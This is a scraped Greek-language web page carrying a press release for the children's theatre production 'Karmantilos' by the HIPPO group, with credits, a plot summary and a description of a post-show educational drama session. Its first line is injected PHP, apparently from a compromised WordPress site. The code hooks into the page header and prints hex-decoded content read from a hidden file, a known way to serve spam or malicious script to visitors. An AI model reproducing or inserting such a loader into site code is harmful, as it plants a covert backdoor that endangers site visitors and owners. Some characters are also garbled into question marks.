if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ΚΑΡΜΑΝΤΗΛΟΣ, ΤΟ ΔΕΛΤΙΟ ΤΥΠΟΥ ΤΗΣ ΠΑΡΑΣΤΑΣΗΣ |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

ΚΑΡΜΑΝΤΗΛΟΣ, ΤΟ ΔΕΛΤΙΟ ΤΥΠΟΥ ΤΗΣ ΠΑΡΑΣΤΑΣΗΣ

Η ομάδα HIPPO μετά την εμπειρία της περσινής επιτυχίας Η Νάντια και το μαγικό ραβδί
και την ενθουσιώδη ανταπόκριση των παιδιών, επιστρέφει με μια ακόμα πληθωρική
θεατρική πρόταση με τίτλο Καρμάντηλος, του Νίκου Τσιώτσου. Το πρόγραμμα αποτελείται από δύο μέρη:
 

  1. Μία φαντασμαγορική κωμωδία βασισμένη στη σωματικότητα της
    θεατρικής έκφρασης (παντομίμα, σωματοποιημένη αφήγηση), στους ξέφρενους διαλόγους, στη ζωντανή μουσική και το τραγούδι και στη χρήση της κούκλας
    (στοιχεία κουκλοθεάτρου),  με θέμα την σύγκρουση του «θέλω» και του
    «πρέπει», της επιθυμίας και του καθήκοντος .
  2. Ένα σχέδιο δράματος, «Μετά την παράσταση», που βασίζεται στις τεχνικές του Εκπαιδευτικού
    Θεάτρου,
    και επεξεργάζεται τα νοήματα του έργου (παιχνίδι, φαντασία, ελευθερία, πειθαναγκασμός, καταπίεση, εσωτερικό ταξίδι, ελεύθερη βούληση, αυτογνωσία).

 
Διάρκεια παράστασης: 40΄
Διάρκεια παιχνιδιού: 40΄
 
Τιμή: 4? το παιδί
 
Συντελεστές:
Η ομάδα HIPPO αποτελείται από τους:
Φώτη Δούσο, μουσικό, θεατροπαιδαγωγό και Αλέξανδρο Ράπτη, μουσικό, σκηνοθέτη
Παίζουν: Κώστας Βοζίκης, Τάσος Δημητρόπουλος, Ανδρομάχη Μακρίδου.
Κείμενο: Νίκος Τσιώτσος, συγγραφέας, εκπαιδευτικός.
Σχεδιασμός δραστηριοτήτων Εκπαιδευτικού Θεάτρου:
ΗIPPO, Μάρθα Κατσαρίδου,  δρ. ΑΠΘ, εκπαιδευτικός, θεατροπαιδαγωγός,
Καλλιόπη Φύκαρη, θεατροπαιδαγωγός, κάτοχος diploma στο Drama in Education.
Επιμέλεια κίνησης: Χάρης Πεχλιβανίδης, ηθοποιός, performer.
Σκηνικά-Kοστούμια: Κατερίνα Χατζοπούλου,σκηνογράφος, ενδυματολόγος,
Βοηθός Σκηνογράφου: Πετρούλα Λιώρα, σκηνογράφος, ενδυματολόγος.
Μάσκες-κούκλες: Μάρθα Φωκά, σκηνογράφος, ενδυματολόγος.
Μουσική:HIPPO, Κώστας Βοζίκης.
Σκηνοθεσία-θεατρική διασκευή: HIPPO.
Περίληψη
Σε μια μακρινή χώρα  (ίσως όχι και τόσο μακρινή..) την Γκρικαράγουα
όλοι δουλεύουν πυρετωδώς για την διοργάνωση των επίσημων αθλητικών αγώνων.
Ωστόσο τα πράγματα δεν πάνε όσο γρήγορα θέλει ο Καρμάντηλος, ηγέτης της
Γκρικαράγουας, και αυτό του προκαλεί άγχος και κατά συνέπεια αϋπνία και
κατάργηση της αυστηρής του δίαιτας! Τα πράγματα γίνονται ακόμα χειρότερα όταν
από μία παρεξήγηση θεσμοθετείται ένα πρωτοφανές άθλημα: το «άλμα επί κοντών»
και αυτό πυροδοτεί την οργή των Νάνων της Τασνανίας? Οι Νάνοι σαμποτάρουν τις
εργασίες, εξαφανίζοντας όλες τις πίστες των αγωνισμάτων και στήνοντας στην θέση
τους ένα μεγαλοπρεπές λούνα παρκ.  Ο
Καρμάντηλος μετά από έναν νευρικό κλονισμό πάει να ελέγξει την κατάσταση ? και
καταλήγει στην «παγίδα των Νάνων», το τρομερό τρενάκι του τρόμου? Η τρομάρα που
θα πάρει εκεί, θα τον κάνει να αναθεωρήσει τις απόψεις του για τους αγώνες.
Νάνοι, Γίγαντες, πουλιά που μιλούν, γιατροί, νοσοκόμοι,
ελεγκτές εισιτηρίων και πλήθος άλλων προσώπων ερμηνευμένα με κέφι, πάθος,
ευρηματικότητα και τρελό ρυθμό από νέους ταλαντούχους ηθοποιούς.
 
Μετά την παράσταση
Τα παιδιά χωρίζονται σε ομάδες και, με την βοήθεια των
εμψυχωτών υποδύονται ρόλους μέσα από την ιστορία που παρακολούθησαν -Γίγαντες,
Νάνους και Πουλιά-. Μέσα από κινητικά παιχνίδια, ομαδικούς και προσωπικούς
αυτοσχεδιασμούς, τεχνικές του Εκπαιδευτικού Δράματος, τα παιδιά μπαίνουν με
ευφάνταστο και διασκεδαστικό τρόπο στην διάσταση του παραμυθιού και καλούνται
να πάρουν αποφάσεις σε κομβικά σημεία για την εξέλιξη της ιστορίας.
Στόχοι του συγκεκριμένου Εκπαιδευτικού Δράματος είναι να
επανεξεταστούν από τα παιδιά έννοιες όπως σωστο- λάθος, επιθυμία- καθήκον, όρια
της ελευθερίας και καταπίεση. Επίσης να δοθεί η ευκαιρία στα παιδιά να σταθούν
κριτικά απέναντι στην παράσταση που μόλις παρακολούθησαν, να αποκτήσουν μια πιο
συνειδητή άποψη απέναντι στο τι σημαίνει«βλέπω», «προσλαμβάνω», «αποδέχομαι», «απορρίπτω».
? Χωρίς να ξεχνάμε βέβαια ότι ο απώτερος στόχος κάθε
δραστηριότητας Εκπαιδευτικού Δράματος είναι η απόλαυση της συμμετοχικότητας και
της δημιουργίας, το ευεργετικό παιχνίδισμα της φαντασίας με την σωματική
εμπλοκή, η χαρά της δράσης μέσα σε ένα ασφαλές πλαίσιο αποδοχής, αλληλεγγύης
και συναισθηματικής πληρότητας!